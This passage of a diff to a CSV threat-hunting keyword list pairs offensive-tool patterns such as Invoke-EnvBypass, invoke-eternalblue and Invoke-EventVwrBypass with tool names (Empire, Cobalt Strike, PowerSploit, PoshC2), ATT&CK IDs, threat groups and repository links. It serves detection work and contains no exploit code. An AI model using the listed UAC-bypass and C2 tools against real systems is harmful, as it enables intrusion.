- T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-EndpointProtectionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-EnumerateAzureBlobs.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Invoke-EnumerateAzureSubDomains.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-Empire*","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EndpointProtectionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-EnumerateAzureBlobs.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-EnumerateAzureSubDomains.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" "*invokeenumeratelocaladmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-EnvBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-EnvBypass.*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*Invoke-EnvBypass.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1125","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-EnvBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EnvBypass.*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*Invoke-EnvBypass.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1125","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EssessAgress*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*invoke-eternalblue*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-EventHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*invoke-eternalblue*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-EventHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-eventhunter*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" "*Invoke-EventViewer *.exe*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*Invoke-EventViewer.ps1*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" -"*Invoke-EventVwrBypass*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*Invoke-EventVwrBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EventVwrBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ExecuteMSBuild*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 